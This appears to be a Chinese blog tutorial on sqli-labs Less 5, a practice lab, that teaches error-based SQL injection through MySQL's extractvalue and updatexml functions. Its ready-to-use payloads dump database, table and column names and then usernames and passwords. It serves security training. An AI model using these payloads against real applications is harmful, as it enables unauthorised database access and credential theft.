在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要报错注入。
1.less 5
正常情况,我们构造闭合,发现没有问题
![](https://img-blog.csdnimg.cn/31d325203d4640268cce55660a1ef465.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQTk4NzQ1NjQ=,size_20,color_FFFFFF,t_70,g_se,x_16)
利用前几关的思路,发现无论怎么操作都是 You are in......,这个时候一般的思路就行不通。
![](https://img-blog.csdnimg.cn/1e9e245c0c8c45c3a651edd8b927fe1c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQTk4NzQ1NjQ=,size_20,color_FFFFFF,t_70,g_se,x_16)
发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试报错注入。
2.报错注入
2.1 extractvalue报错
示例:
and extractvalue(null,concat(0x7e,(sql_inject),0x7e)) 注释:sql_inject 指需要查询的数据。
可以理解为,让后台XML故意报错。
0X7e的具体含义:0x7e=~(类似波浪线符号)
利用这种方式,对后台进行一个排序。指定第一个参数为null,使其故意报错,将第二个参数中的语句带入数据库执行,最后报错显示执行结果。
实验:
0x00爆库名
id=1' and extractvalue(null,concat(0x7e,(select database()),0x7e))
![](https://img-blog.csdnimg.cn/9e4c1b2019fa44c5924be43f7aaf6620.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQTk4NzQ1NjQ=,size_20,color_FFFFFF,t_70,g_se,x_16)
0x01爆表名
and extractvalue(null,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e)
![](https://img-blog.csdnimg.cn/2d3d8232db0b4742a92b21fda44ca868.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQTk4NzQ1NjQ=,size_20,color_FFFFFF,t_70,g_se,x_16)
XPATH syntax error: '~emails,referers,uagents,users~' (XPATH语法错误,null显示报错,输出了我们要查询数据)
0x02爆列名
and extractvalue(null,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') ,0x7e))
0x03爆数据
limit 0,1 第一项数据,limit 1,1 第二项数据,limit 2,1第三项数据,以此类推;
and extractvalue(null,concat(0x7e,(select username from users limit 0,1),0x7e))
![](https://img-blog.csdnimg.cn/a58a28dd3b5946d59831c2ba3eff63df.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQTk4NzQ1NjQ=,size_20,color_FFFFFF,t_70,g_se,x_16)
and extractvalue(null,concat(0x7e,(select password from users limit 0,1),0x7e))
![](https://img-blog.csdnimg.cn/40848784ca8a4049970864bbfb5efd14.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQTk4NzQ1NjQ=,size_20,color_FFFFFF,t_70,g_se,x_16)
2.2 updatexml报错
0x00爆库
and updatexml(1,concat(0x7e,(select database()),0x7e),1) --
0X01 爆表名
and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)
0x02爆列名
and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)
![](https://img-blog.csdnimg.cn/5c28ef160b144d55b1d5f1a289aa2d78.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQTk4NzQ1NjQ=,size_20,color_FFFFFF,t_70,g_se,x_16)
0x03爆数据
and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1)
and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1)
![](https://img-blog.csdnimg.cn/050a8bc7870246739d7ea9ff6c5be9b1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQTk4NzQ1NjQ=,size_20,color_FFFFFF,t_70,g_se,x_16)